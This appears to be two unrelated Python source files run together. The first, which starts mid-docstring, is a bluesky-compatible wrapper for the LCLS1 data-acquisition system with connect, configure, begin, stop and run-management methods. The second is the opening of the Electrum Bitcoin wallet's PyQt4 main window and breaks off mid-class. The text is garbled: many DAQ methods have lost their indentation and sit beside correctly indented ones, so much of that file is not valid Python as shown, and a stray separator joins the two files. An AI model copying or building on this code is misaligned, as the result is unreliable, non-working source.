The LCLS1 daq as a ``bluesky``-compatible object.
This uses the ``pydaq`` module to connect with a running daq instance,
controlling it via socket commands.
It can be used as a ``Reader`` in a ``bluesky`` plan to take data at
discrete scan points.
It can be used as a ``Flyer`` in a ``bluesky`` plan to have the daq start
at the beginning of the run and end at the end of the run.
Unlike normal ``bluesky`` readable devices or flyers, this has no data to
report to the ``RunEngine`` on the ``read`` or ``collect`` calls. No data
will pass into the python layer from the daq.
Parameters
----------
RE: ``RunEngine``, optional
Set ``RE`` to the session's main ``RunEngine``
"""
_state_enum = enum.Enum('PydaqState',
'Disconnected Connected Configured Open Running',
start=0)
default_config = dict(events=None,
duration=None,
use_l3t=False,
record=False,
controls=None,
begin_sleep=0)
name = 'daq'
parent = None
    def __init__(self, RE=None):
        # Lazily import pydaq into module globals so that importing this
        # module does not require pydaq to be installed.
        if pydaq is None:
            globals()['pydaq'] = import_module('pydaq')
        super().__init__()
        self._control = None        # pydaq.Control handle, set by connect()
        self._config = None         # last successfully applied configuration
        self._desired_config = {}   # changes queued for the next configure()
        self._reset_begin()
        self._host = os.uname()[1]  # hostname passed to pydaq.Control
        self._RE = RE               # bluesky RunEngine, used by stage()
        self._re_cbid = None        # RunEngine subscription id
        self._config_ts = {}        # per-key config timestamps for bluesky
        self._update_config_ts()
        self._pre_run_state = None  # daq state cached at stage() time
        self._last_stop = 0         # time of the last stop, for throttling
        register_daq(self)
# Convenience properties
@property
def connected(self):
"""
``True`` if the daq is connected, ``False`` otherwise.
"""
return self._control is not None
@property
def configured(self):
"""
``True`` if the daq is configured, ``False`` otherwise.
"""
return self._config is not None
@property
def config(self):
"""
The current configuration, e.g. the last call to `configure`
"""
if self.configured:
return self._config.copy()
else:
return self.default_config.copy()
@property
def next_config(self):
"""
The next queued configuration.
This can be different than `config` if we have queued up a
configuration to be run on the next begin.
"""
cfg = self.config
cfg.update(self._desired_config)
return cfg
@property
def state(self):
"""
State as reported by the daq. Can be any of the following:
- ``Disconnected``: No active session in python
- ``Connected``: Active session in python
- ``Configured``: Connected, and the daq has been configured
- ``Open``: We are in the middle of a run
- ``Running``: We are collecting data in a run
"""
if self.connected:
logger.debug('calling Daq.control.state()')
num = self._control.state()
return self._state_enum(num).name
else:
return 'Disconnected'
# Interactive methods
    def connect(self):
        """
        Connect to the live DAQ, giving full control to the Python process.
        To undo this, you may call `disconnect`.
        """
        logger.debug('Daq.connect()')
        err = False
        conn = False
        if self._control is None:
            # The daq platform number is not known in advance; probe 0-5.
            for plat in range(6):
                try:
                    logger.debug(('instantiate Daq.control '
                                  '= pydaq.Control(%s, %s)'),
                                 self._host, plat)
                    self._control = pydaq.Control(self._host, platform=plat)
                    logger.debug('Daq.control.connect()')
                    self._control.connect()
                    logger.info('Connected to DAQ')
                    conn = True
                    break
                except Exception as exc:
                    # A 'query' error means a daq exists on this platform but
                    # is allocated elsewhere; any other error is treated as
                    # "no daq here" and we try the next platform.
                    if 'query' in str(exc):
                        err = True
                        logger.error(('Failed to connect: DAQ is not '
                                      'allocated!'))
            if not (err or conn):
                err = True
                logger.error(('Failed to connect: DAQ is not running on this '
                              'machine, and is not allocated!'))
            if err:
                # Drop any partially-created control object on failure.
                logger.debug('del Daq.control')
                del self._control
                self._control = None
        else:
            logger.info('Connect requested, but already connected to DAQ')
    def disconnect(self):
        """
        Disconnect from the live DAQ, giving control back to the GUI.
        This is the opposite of `connect`.
        """
        logger.debug('Daq.disconnect()')
        if self._control is not None:
            # Close out any open run before releasing the session.
            self.end_run()
            self._control.disconnect()
            del self._control
            self._control = None
        # Keep the old configuration queued so a reconnect can reapply it.
        self._desired_config = self._config or {}
        self._config = None
        logger.info('DAQ is disconnected.')
@check_connect
def wait(self, timeout=None):
"""
Pause the thread until the DAQ is done aquiring.
Parameters
----------
timeout: ``float``
Maximum time to wait in seconds.
"""
logger.debug('Daq.wait()')
if self.state == 'Running':
if self._events or self._duration:
status = self._get_end_status()
status_wait(status, timeout=timeout)
else:
raise RuntimeError('Cannot wait, daq configured to run '
'forever.')
def begin(self, events=None, duration=None, record=None, use_l3t=None,
controls=None, wait=False, end_run=False):
"""
Start the daq and block until the daq has begun acquiring data.
Optionally block with ``wait=True`` until the daq has finished aquiring
data. If blocking, a ``ctrl+c`` will end the run and clean up.
If omitted, any argument that is shared with `configure`
will fall back to the configured value.
Internally, this calls `kickoff` and manages its ``Status`` object.
Parameters
----------
events: ``int``, optional
Number events to take in the daq.
duration: ``int``, optional
Time to run the daq in seconds, if ``events`` was not provided.
record: ``bool``, optional
If ``True``, we'll configure the daq to record data before this
run.
use_l3t: ``bool``, optional
If ``True``, we'll run with the level 3 trigger. This means that
if we specified a number of events, we will wait for that many
"good" events as determined by the daq.
controls: ``dict{name: device}`` or ``list[device...]``, optional
If provided, values from these will make it into the DAQ data
stream as variables. We will check ``device.position`` and
``device.value`` for quantities to use and we will update these
values each time begin is called. To provide a list, all devices
must have a ``name`` attribute.
wait: ``bool``, optional
If ``True``, wait for the daq to finish aquiring data. A
``KeyboardInterrupt`` (``ctrl+c``) during this wait will end the
run and clean up.
end_run: ``bool``, optional
If ``True``, we'll end the run after the daq has stopped.
"""
logger.debug(('Daq.begin(events=%s, duration=%s, record=%s, '
'use_l3t=%s, controls=%s, wait=%s)'),
events, duration, record, use_l3t, controls, wait)
try:
if record is not None and record != self.record:
old_record = self.record
self.preconfig(record=record, show_queued_cfg=False)
begin_status = self.kickoff(events=events, duration=duration,
use_l3t=use_l3t, controls=controls)
status_wait(begin_status, timeout=self._begin_timeout)
# In some daq configurations the begin status returns very early,
# so we allow the user to configure an emperically derived extra
# sleep.
time.sleep(self.config['begin_sleep'])
if wait:
self.wait()
if end_run:
self.end_run()
if end_run and not wait:
threading.Thread(target=self._ender_thread, args=()).start()
except KeyboardInterrupt:
self.end_run()
logger.info('%s.begin interrupted, ending run', self.name)
finally:
try:
self.preconfig(record=old_record, show_queued_cfg=False)
except NameError:
pass
    @property
    def _begin_timeout(self):
        # Allow for both the begin transition itself and the post-stop
        # throttle window that kickoff may sleep through.
        return BEGIN_TIMEOUT + BEGIN_THROTTLE
    def begin_infinite(self, record=None, use_l3t=None, controls=None):
        """
        Start the daq to run forever in the background.
        """
        # events=0 means "run until manually stopped" (see _begin_args).
        self.begin(events=0, record=record, use_l3t=use_l3t,
                   controls=controls, wait=False, end_run=False)
    def _ender_thread(self):
        """
        End the run when the daq stops aquiring.

        Runs in a background thread started by `begin` when
        ``end_run=True`` and ``wait=False``.
        """
        self.wait()
        self.end_run()
    @check_connect
    def stop(self):
        """
        Stop the current acquisition, ending it early.
        """
        logger.debug('Daq.stop()')
        self._control.stop()
        self._reset_begin()
        # Record when we stopped so kickoff can throttle the next begin.
        self._last_stop = time.time()
    @check_connect
    def end_run(self):
        """
        Call `stop`, then mark the run as finished.
        """
        logger.debug('Daq.end_run()')
        self.stop()
        # endrun closes out the run in the daq, finalizing the run number.
        self._control.endrun()
# Reader interface
@check_connect
def trigger(self):
"""
Begin acquisition. This method blocks until the run begins.
Returns a status object that will be marked done when the daq has
stopped acquiring.
This will raise a RuntimeError if the daq was never configured for
events or duration.
Returns
-------
done_status: ``Status``
``Status`` that will be marked as done when the daq has begun.
"""
cfg = self.next_config
if all(cfg[key] is None for key in ('events', 'duration')):
raise RuntimeError('Cannot start daq in scan step, did not '
'configure events or duration.')
self.begin()
return self._get_end_status()
def read(self):
"""
Return data. There is no data implemented yet.
This also stops if running so you can use this device in a bluesky scan
and wait for "everything else" to be done, then stop the daq
afterwards.
"""
if self.state == 'Running':
self.stop()
return {}
    def describe(self):
        """
        Explain what read returns. There is nothing yet.
        """
        return {}
# Flyer interface
@check_connect
def kickoff(self, events=None, duration=None, use_l3t=None, controls=None):
"""
Begin acquisition. This method is non-blocking.
See `begin` for a description of the parameters.
This method does not supply arguments for configuration parameters, it
supplies arguments directly to ``pydaq.Control.begin``. It will
configure before running if there are queued configuration changes.
This is part of the ``bluesky`` ``Flyer`` interface.
Returns
-------
ready_status: ``Status``
``Status`` that will be marked as done when the daq has begun.
"""
logger.debug('Daq.kickoff()')
self._check_duration(duration)
if self._desired_config or not self.configured:
try:
self.configure()
except StateTransitionError:
err = ('Illegal reconfigure with {} during an open run. End '
'the current run with daq.end_run() before running '
'with a new configuration'.format(self._desired_config))
logger.debug(err, exc_info=True)
raise StateTransitionError(err)
def start_thread(control, status, events, duration, use_l3t, controls):
tmo = self._begin_timeout
dt = 0.1
logger.debug('Make sure daq is ready to begin')
# Stop and start if we already started
if self.state in ('Open', 'Running'):
self.stop()
# It can take up to 0.4s after a previous begin to be ready
while tmo > 0:
if self.state in ('Configured', 'Open'):
break
else:
tmo -= dt
if self.state in ('Configured', 'Open'):
begin_args = self._begin_args(events, duration, use_l3t,
controls)
if self.config['record']:
try:
prev_run = self.run_number()
next_run = prev_run + 1
logger.info('Beginning daq run %s', next_run)
except (RuntimeError, ValueError):
logger.debug('Error getting run number in kickoff',
exc_info=True)
logger.debug('daq.control.begin(%s)', begin_args)
dt = time.time() - self._last_stop
tmo = BEGIN_THROTTLE - dt
if tmo > 0:
time.sleep(tmo)
control.begin(**begin_args)
# Cache these so we know what the most recent begin was told
self._begin = dict(events=events, duration=duration,
use_l3t=use_l3t, controls=controls)
logger.debug('Marking kickoff as complete')
status._finished(success=True)
else:
logger.debug('Marking kickoff as failed')
status._finished(success=False)
begin_status = Status(obj=self)
watcher = threading.Thread(target=start_thread,
args=(self._control, begin_status, events,
duration, use_l3t, controls))
watcher.start()
return begin_status
def complete(self):
"""
If the daq is freely running, this will `stop` the daq.
Otherwise, we'll simply collect the end_status object.
Returns
-------
end_status: ``Status``
``Status`` that will be marked as done when the DAQ has finished
acquiring
"""
logger.debug('Daq.complete()')
end_status = self._get_end_status()
if not (self._events or self._duration):
# Configured to run forever
self.stop()
return end_status
    def _get_end_status(self):
        """
        Return a `Status` object that will be marked done when the DAQ has
        finished acquiring.

        This will be marked as done immediately if the daq is configured to
        run forever, because waiting for the end doesn't make sense in this
        case.

        Returns
        -------
        end_status: `Status`
        """
        logger.debug('Daq._get_end_status()')
        if self._events or self._duration:
            def finish_thread(control, status):
                # Worker thread: control.end() blocks until the daq stops.
                try:
                    logger.debug('Daq.control.end()')
                    control.end()
                except RuntimeError:
                    pass  # This means we aren't running, so no need to wait
                self._last_stop = time.time()
                self._reset_begin()
                status._finished(success=True)
                logger.debug('Marked acquisition as complete')
            end_status = Status(obj=self)
            watcher = threading.Thread(target=finish_thread,
                                       args=(self._control, end_status))
            watcher.start()
            return end_status
        else:
            # Configured to run forever, say we're done so we can wait for just
            # the other things in the scan
            return Status(obj=self, done=True, success=True)
    def collect(self):
        """
        Collect data as part of the ``bluesky`` ``Flyer`` interface.

        As per the ``bluesky`` interface, this is a generator that is
        expected to output partial event documents. However, since we don't
        have any events to report to python, this will be a generator that
        immediately ends.
        """
        logger.debug('Daq.collect()')
        yield from ()
    def describe_collect(self):
        """
        As per the ``bluesky`` interface, this is how you interpret the null
        data from `collect`. There isn't anything here, as nothing will be
        collected.
        """
        logger.debug('Daq.describe_collect()')
        return {}
def preconfig(self, events=None, duration=None, record=None, use_l3t=None,
controls=None, begin_sleep=None, show_queued_cfg=True):
"""
Queue configuration parameters for next call to `configure`.
These will be overridden by arguments passed directly to `configure`.
These will be cleared after each call to `configure`.
This can be used to `configure` the `Daq` object without connecting.
This will display the next queued configuration using logger.info,
assuming the logger has been configured.
"""
# Only one of (events, duration) should be preconfigured.
if events is not None:
self._desired_config['events'] = events
self._desired_config['duration'] = None
elif duration is not None:
self._desired_config['events'] = None
self._desired_config['duration'] = duration
for arg, name in zip((record, use_l3t, controls, begin_sleep),
('record', 'use_l3t', 'controls', 'begin_sleep')):
if arg is not None:
self._desired_config[name] = arg
if show_queued_cfg:
self.config_info(self.next_config, 'Queued config:')
    @check_connect
    def configure(self, events=None, duration=None, record=None,
                  use_l3t=None, controls=None, begin_sleep=None):
        """
        Changes the daq's configuration for the next run.

        This is the method that directly interfaces with the daq. If you
        simply want to get a configuration ready for later, use `preconfig`.

        Parameters
        ----------
        events: ``int``, optional
            If provided, the daq will run for this many events before
            stopping, unless we override in `begin`.
            If not provided, we'll use the ``duration`` argument instead.
        duration: ``int``, optional
            If provided, the daq will run for this many seconds before
            stopping, unless we override in `begin`.
            If not provided, and ``events`` was also not provided, an empty
            call like ``begin()`` will run indefinitely.
        record: ``bool``, optional
            If ``True``, we'll record the data. Otherwise, we'll run without
            recording. Defaults to ``False``, or the last set value for
            ``record``.
        use_l3t: ``bool``, optional
            If ``True``, an ``events`` argument to begin will be
            reinterpreted to only count events that pass the level 3
            trigger. Defaults to its last configured value, or ``False``.
        controls: ``dict{name: device}`` or ``list[device...]``, optional
            If provided, values from these will make it into the DAQ data
            stream as variables. We will check ``device.position`` and
            ``device.value`` for quantities to use and we will update these
            values each time begin is called. To provide a list, all devices
            must have a ``name`` attribute.
        begin_sleep: ``int``, optional
            The amount of time to wait after the DAQ returns begin is done.
            This is a hack because the DAQ often says that a begin
            transition is done without actually being done, so it needs a
            short delay.

        Returns
        -------
        old, new: ``tuple`` of ``dict``
            The old configuration and the new configuration. These
            dictionaries are verbose, containing all configuration values
            and the timestamps at which they were configured, as specified
            by ``bluesky``.

        Raises
        ------
        StateTransitionError
            If called while a run is open or data is being taken.
        RuntimeError
            If the underlying pydaq configure call fails.
        """
        logger.debug('Daq.configure(events=%s, duration=%s, record=%s, '
                     'use_l3t=%s, controls=%s, begin_sleep=%s)',
                     events, duration, record, use_l3t, controls, begin_sleep)
        state = self.state
        if state not in ('Connected', 'Configured'):
            err = 'Cannot configure from state {}!'.format(state)
            raise StateTransitionError(err)
        self._check_duration(duration)
        old = self.read_configuration()
        # Merge direct arguments over any queued configuration.
        self.preconfig(events=events, duration=duration, record=record,
                       use_l3t=use_l3t, controls=controls,
                       begin_sleep=begin_sleep, show_queued_cfg=False)
        config = self.next_config
        events = config['events']
        duration = config['duration']
        record = config['record']
        use_l3t = config['use_l3t']
        controls = config['controls']
        begin_sleep = config['begin_sleep']
        logger.debug('Updated with queued config, now we have: '
                     'events=%s, duration=%s, record=%s, '
                     'use_l3t=%s, controls=%s, begin_sleep=%s',
                     events, duration, record, use_l3t, controls, begin_sleep)
        config_args = self._config_args(record, use_l3t, controls)
        try:
            logger.debug('Daq.control.configure(%s)',
                         config_args)
            self._control.configure(**config_args)
            # self._config should reflect exactly the arguments to configure,
            # this is different than the arguments that pydaq.Control expects
            self._config = dict(events=events, duration=duration,
                                record=record, use_l3t=use_l3t,
                                controls=controls, begin_sleep=begin_sleep)
            self._update_config_ts()
            self.config_info(header='Daq configured:')
        except Exception as exc:
            self._config = None
            msg = 'Failed to configure!'
            logger.debug(msg, exc_info=True)
            raise RuntimeError(msg) from exc
        new = self.read_configuration()
        self._desired_config = {}
        return old, new
def config_info(self, config=None, header='Config:'):
"""
Show the config information as a logger.info message.
This will print to the screen if the logger is configured correctly.
Parameters
----------
config: ``dict``, optional
The configuration to show. If omitted, we'll use the current
config.
header: ``str``, optional
A prefix for the config line.
"""
if config is None:
config = self.config
txt = []
for key, value in config.items():
if value is not None:
txt.append('{}={}'.format(key, value))
if header:
header += ' '
logger.info(header + ', '.join(txt))
    @property
    def record(self):
        """
        If ``True``, we'll configure the daq to record data. If ``False``, we
        will configure the daq to not record data.

        Setting this is the equivalent of scheduling a `configure` call to be
        executed later, e.g. ``configure(record=True)``
        """
        # Read from next_config so queued-but-unapplied changes are visible.
        return self.next_config['record']
    @record.setter
    def record(self, record):
        # Queue the change; it takes effect on the next configure/begin.
        self.preconfig(record=record)
def _update_config_ts(self):
"""
Create timestamps and update the ``bluesky`` readback for
`read_configuration`
"""
for k, v in self.config.items():
old_value = self._config_ts.get(k, {}).get('value')
if old_value is None or v != old_value:
self._config_ts[k] = dict(value=v,
timestamp=time.time())
def _config_args(self, record, use_l3t, controls):
"""
For a given set of arguments to `configure`, return the arguments that
should be sent to ``pydaq.Control.configure``.
Returns
-------
config_args: dict
"""
logger.debug('Daq._config_args(%s, %s, %s)',
record, use_l3t, controls)
config_args = {}
config_args['record'] = record
if use_l3t:
config_args['l3t_events'] = 0
else:
config_args['events'] = 0
if controls is not None:
config_args['controls'] = self._ctrl_arg(controls)
return config_args
def _ctrl_arg(self, controls):
"""
Assemble the list of ``(str, val)`` pairs from a ``{str: device}``
dictionary or a device ``list``
Returns
-------
ctrl_arg: ``list[(str, val), ...]``
"""
ctrl_arg = []
if isinstance(controls, list):
names = [dev.name for dev in controls]
devices = controls
elif isinstance(controls, dict):
names = controls.keys()
devices = controls.values()
for name, device in zip(names, devices):
try:
val = device.position
except AttributeError:
val = device.value
ctrl_arg.append((name, val))
return ctrl_arg
def _begin_args(self, events, duration, use_l3t, controls):
"""
For a given set of arguments to `begin`, return the arguments that
should be sent to ``pydaq.Control.begin``
Returns
-------
begin_args: ``dict``
"""
logger.debug('Daq._begin_args(%s, %s, %s, %s)',
events, duration, use_l3t, controls)
begin_args = {}
if events is None and duration is None:
events = self.config['events']
duration = self.config['duration']
if events is not None:
if use_l3t is None and self.configured:
use_l3t = self.config['use_l3t']
if use_l3t:
begin_args['l3t_events'] = events
else:
begin_args['events'] = events
elif duration is not None:
secs = int(duration)
nsec = int((duration - secs) * 1e9)
begin_args['duration'] = [secs, nsec]
else:
begin_args['events'] = 0 # Run until manual stop
if controls is None:
ctrl_dict = self.config['controls']
if ctrl_dict is not None:
begin_args['controls'] = self._ctrl_arg(ctrl_dict)
else:
begin_args['controls'] = self._ctrl_arg(controls)
return begin_args
def _check_duration(self, duration):
if duration is not None and duration < 1:
msg = ('Duration argument less than 1 is unreliable. Please '
'use the events argument to specify the length of '
'very short runs.')
raise RuntimeError(msg)
def read_configuration(self):
"""
``bluesky`` interface for checking the current configuration
Returns
-------
config: ``dict``
Mapping of config key to current configured value and timestamp
when it was last set.
"""
logger.debug('Daq.read_configuration()')
return self._config_ts.copy()
def describe_configuration(self):
"""
``bluesky`` interface for describing how to interpret the configured
values
Returns
-------
config_desc: ``dict``
Mapping of config key to field metadata.
"""
logger.debug('Daq.describe_configuration()')
try:
controls_shape = [len(self.config['controls']), 2]
except (TypeError, RuntimeError, AttributeError):
controls_shape = []
return dict(events=dict(source='daq_events_in_run',
dtype='number',
shape=[]),
duration=dict(source='daq_run_duration',
dtype='number',
shape=[]),
use_l3t=dict(source='daq_use_l3trigger',
dtype='number',
shape=[]),
record=dict(source='daq_record_run',
dtype='number',
shape=[]),
controls=dict(source='daq_control_vars',
dtype='array',
shape=controls_shape),
begin_sleep=dict(source='daq_begin_sleep',
dtype='number',
shape=[]),
)
    def stage(self):
        """
        ``bluesky`` interface for preparing a device for action.

        This sets up the daq to end runs on run stop documents.
        It also caches the current state, so we know what state to return to
        after the ``bluesky`` scan.
        If a run is already started, we'll end it here so that we can start a
        new run during the scan.

        Returns
        -------
        staged: ``list``
            list of devices staged
        """
        logger.debug('Daq.stage()')
        self._pre_run_state = self.state
        # Subscribe only once; unstage clears the id again.
        if self._re_cbid is None:
            self._re_cbid = self._RE.subscribe(self._re_manage_runs)
        self.end_run()
        return [self]
    def _re_manage_runs(self, name, doc):
        """
        Callback for the RunEngine to manage run start and stop.

        Only the 'stop' document is acted on: it ends the daq run.
        """
        if name == 'stop':
            self.end_run()
def unstage(self):
"""
``bluesky`` interface for undoing the `stage` routine.
Returns
-------
unstaged: ``list``
list of devices unstaged
"""
logger.debug('Daq.unstage()')
if self._re_cbid is not None:
self._RE.unsubscribe(self._re_cbid)
self._re_cbid = None
# If we're still running, end now
if self.state in ('Open', 'Running'):
self.end_run()
# Return to the state we had at stage
if self._pre_run_state == 'Disconnected':
self.disconnect()
elif self._pre_run_state == 'Running':
self.begin_infinite()
# For other states, end_run was sufficient.
return [self]
    def pause(self):
        """
        ``bluesky`` interface for determining what to do when a plan is
        interrupted. This will call `stop`, but it will not call `end_run`.
        """
        logger.debug('Daq.pause()')
        if self.state == 'Running':
            self.stop()
    def resume(self):
        """
        ``bluesky`` interface for determining what to do when an interrupted
        plan is resumed. This will call `begin`.
        """
        logger.debug('Daq.resume()')
        # 'Open' means the run is still open but not acquiring (see pause).
        if self.state == 'Open':
            self.begin()
    @property
    def _events(self):
        """
        For the current `begin` cycle, how many ``events`` we told the daq to
        run for.
        """
        # Prefer the most recent begin's value, fall back to the config.
        return self._begin['events'] or self.config['events']
    @property
    def _duration(self):
        """
        For the current `begin` cycle, how long we told the daq to run for in
        seconds.
        """
        # Prefer the most recent begin's value, fall back to the config.
        return self._begin['duration'] or self.config['duration']
    def _reset_begin(self):
        """
        Reset ``_begin`` to starting values for when we aren't running.
        """
        self._begin = dict(events=None, duration=None, use_l3t=None,
                           controls=None)
def run_number(self, hutch_name=None):
"""
Determine the run number of the last run, or current run if running.
This requires you to be on an NFS-mounted host. If hutch can be
determined from the get_hutch_name script from engineering_tools, then
you don't need to pass in a hutch name.
This is a method and not a property because all properties are
run when you try to tab complete, and this isn't necessarily an
instant check. It can also display log messages, which would be
annoying on tab complete.
Parameters
----------
hutch_name: ``str``, optional
The hutch to check the run number for. If omitted, we'll guess
the hutch based on your session details.
Returns
-------
run_number: ``int``
The current run number, or previous run if not recording.
Raises
------
RuntimeError:
if we have no access to NFS
ValueError:
if an invalid hutch was passed
"""
try:
if hutch_name is None:
hutch_name = ext_scripts.hutch_name()
if hutch_name not in ('amo', 'sxr', 'xpp', 'xcs', 'mfx', 'cxi',
'mec', 'tst'):
raise ValueError(('{} is not a valid hutch, cannot determine '
'run number'.format(hutch_name)))
if self.state in ('Open', 'Running') and self.config['record']:
return ext_scripts.get_run_number(hutch=hutch_name, live=True)
else:
return ext_scripts.get_run_number(hutch=hutch_name, live=False)
except FileNotFoundError:
raise RuntimeError('No nfs access, cannot determine run number.')
    def __del__(self):
        # Best-effort cleanup: release the daq session on garbage collection,
        # swallowing errors since interpreter shutdown state is unreliable.
        try:
            self.disconnect()
        except Exception:
            pass
    def set_filter(self, *args, event_codes=None, operator='&', or_bykik=True):
        # Thin wrapper around ami.set_pyami_filter; see copied __doc__ below.
        return set_pyami_filter(*args, event_codes=event_codes,
                                operator=operator, or_bykik=or_bykik)
    set_filter.__doc__ = set_pyami_filter.__doc__
    def set_monitor(self, det):
        # Thin wrapper around ami.set_monitor_det; see copied __doc__ below.
        return set_monitor_det(det)
    set_monitor.__doc__ = set_monitor_det.__doc__
class StateTransitionError(Exception):
    """Raised when the daq cannot make the requested transition from its
    current state (e.g. reconfiguring during an open run)."""
    pass
# Module-level singleton slot; there is only ever one Daq.
_daq_instance = None


def register_daq(daq):
    """
    Save our one daq instance as the real `Daq`.

    Called by `Daq` at the end of ``__init__``. There will always only be
    one `Daq`.

    Parameters
    ----------
    daq: `Daq`
    """
    global _daq_instance
    _daq_instance = daq
def get_daq():
    """
    Fetch the registered `Daq` instance for use by other modules.

    Returns
    -------
    daq: `Daq`
    """
    return _daq_instance
|
main_window.py | #!/usr/bin/env python
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2012 thomasv@gitorious
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import sys, time, threading
import os, json, traceback
import shutil
import socket
import weakref
import webbrowser
import csv
from decimal import Decimal
import base64
from functools import partial
import PyQt4
from PyQt4.QtGui import *
from PyQt4.QtCore import *
import PyQt4.QtCore as QtCore
import icons_rc
from electrum.bitcoin import COIN, is_valid, TYPE_ADDRESS
from electrum.plugins import run_hook
from electrum.i18n import _
from electrum.util import (block_explorer, block_explorer_info, format_time,
block_explorer_URL, format_satoshis, PrintError,
format_satoshis_plain, NotEnoughFunds, StoreDict,
UserCancelled)
from electrum import Transaction, mnemonic
from electrum import util, bitcoin, commands, coinchooser
from electrum import SimpleConfig, paymentrequest
from electrum.wallet import Wallet, BIP32_RD_Wallet, Multisig_Wallet
from amountedit import BTCAmountEdit, MyLineEdit, BTCkBEdit
from network_dialog import NetworkDialog
from qrcodewidget import QRCodeWidget, QRDialog
from qrtextedit import ShowQRTextEdit
from transaction_dialog import show_transaction
from electrum import ELECTRUM_VERSION
import re
from util import *
class StatusBarButton(QPushButton):
    """Small flat icon button for the status bar that calls ``func`` when
    clicked or when Return is pressed while focused."""

    def __init__(self, icon, tooltip, func):
        QPushButton.__init__(self, icon, '')
        self.setToolTip(tooltip)
        self.setFlat(True)
        self.setMaximumWidth(25)
        self.clicked.connect(self.onPress)
        self.func = func
        self.setIconSize(QSize(25,25))

    def onPress(self, checked=False):
        '''Drops the unwanted PyQt4 "checked" argument'''
        self.func()

    def keyPressEvent(self, e):
        # Also trigger the callback on Return, which QPushButton does not
        # do by default.
        if e.key() == QtCore.Qt.Key_Return:
            self.func()
from electrum.paymentrequest import PR_UNPAID, PR_PAID, PR_UNKNOWN, PR_EXPIRED
# Icon resource per payment-request state (PR_UNKNOWN has no icon).
pr_icons = {
    PR_UNPAID:":icons/unpaid.png",
    PR_PAID:":icons/confirmed.png",
    PR_EXPIRED:":icons/expired.png"
}
# Translated tooltip/label per payment-request state.
pr_tooltips = {
    PR_UNPAID:_('Pending'),
    PR_PAID:_('Paid'),
    PR_EXPIRED:_('Expired')
}
# (label, seconds) choices for request expiration; None means no expiry.
expiration_values = [
    (_('1 hour'), 60*60),
    (_('1 day'), 24*60*60),
    (_('1 week'), 7*24*60*60),
    (_('Never'), None)
]
class ElectrumWindow(QMainWindow, MessageBoxMixin, PrintError):
    def __init__(self, gui_object, wallet):
        QMainWindow.__init__(self)
        self.gui_object = gui_object
        # Shared application-level objects come from the gui controller.
        self.config = config = gui_object.config
        self.network = gui_object.daemon.network
        self.invoices = gui_object.invoices
        self.contacts = gui_object.contacts
        self.tray = gui_object.tray
        self.app = gui_object.app
        self.cleaned_up = False
        self.create_status_bar()
        self.need_update = threading.Event()
        # Display preferences for amounts.
        self.decimal_point = config.get('decimal_point', 5)
        self.num_zeros = int(config.get('num_zeros',0))
        self.completions = QStringListModel()
        # Main tabbed layout.
        self.tabs = tabs = QTabWidget(self)
        tabs.addTab(self.create_history_tab(), _('History') )
        tabs.addTab(self.create_send_tab(), _('Send') )
        tabs.addTab(self.create_receive_tab(), _('Receive') )
        tabs.addTab(self.create_addresses_tab(), _('Addresses') )
        tabs.addTab(self.create_contacts_tab(), _('Contacts') )
        tabs.addTab(self.create_console_tab(), _('Console') )
        tabs.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding)
        self.setCentralWidget(tabs)
        if self.config.get("is_maximized"):
            self.showMaximized()
        self.setWindowIcon(QIcon(":icons/electrum.png"))
        self.init_menubar()
        # Weak proxy so the shortcut lambdas don't keep the tabs alive.
        wrtabs = weakref.proxy(tabs)
        QShortcut(QKeySequence("Ctrl+W"), self, self.close)
        QShortcut(QKeySequence("Ctrl+Q"), self, self.close)
        QShortcut(QKeySequence("Ctrl+R"), self, self.update_wallet)
        QShortcut(QKeySequence("Ctrl+PgUp"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() - 1)%wrtabs.count()))
        QShortcut(QKeySequence("Ctrl+PgDown"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() + 1)%wrtabs.count()))
        # Alt+1..N jumps straight to tab N (i bound as default arg on
        # purpose: avoids the late-binding closure pitfall).
        for i in range(wrtabs.count()):
            QShortcut(QKeySequence("Alt+" + str(i + 1)), self, lambda i=i: wrtabs.setCurrentIndex(i))
        self.connect(self, QtCore.SIGNAL('payment_request_ok'), self.payment_request_ok)
        self.connect(self, QtCore.SIGNAL('payment_request_error'), self.payment_request_error)
        self.history_list.setFocus(True)
        # network callbacks
        if self.network:
            self.connect(self, QtCore.SIGNAL('network'), self.on_network_qt)
            interests = ['updated', 'new_transaction', 'status',
                         'banner', 'verified']
            # To avoid leaking references to "self" that prevent the
            # window from being GC-ed when closed, callbacks should be
            # methods of this class only, and specifically not be
            # partials, lambdas or methods of subobjects. Hence...
            self.network.register_callback(self.on_network, interests)
            # set initial message
            self.console.showMessage(self.network.banner)
        # Per-window state.
        self.payment_request = None
        self.checking_accounts = False
        self.qr_window = None
        self.not_enough_funds = False
        self.pluginsdialog = None
        self.fetch_alias()
        self.require_fee_update = False
        self.tx_notifications = []
        self.tl_windows = []
        self.load_wallet(wallet)
        self.connect_slots(gui_object.timer)
    def push_top_level_window(self, window):
        '''Used for e.g. tx dialog box to ensure new dialogs are appropriately
        parented. This used to be done by explicitly providing the parent
        window, but that isn't something hardware wallet prompts know.'''
        self.tl_windows.append(window)
    def pop_top_level_window(self, window):
        # Inverse of push_top_level_window; raises ValueError if not pushed.
        self.tl_windows.remove(window)
    def top_level_window(self):
        '''Do the right thing in the presence of tx dialog windows'''
        # Most recently pushed dialog (if any) becomes the dialog parent.
        override = self.tl_windows[-1] if self.tl_windows else None
        return self.top_level_window_recurse(override)
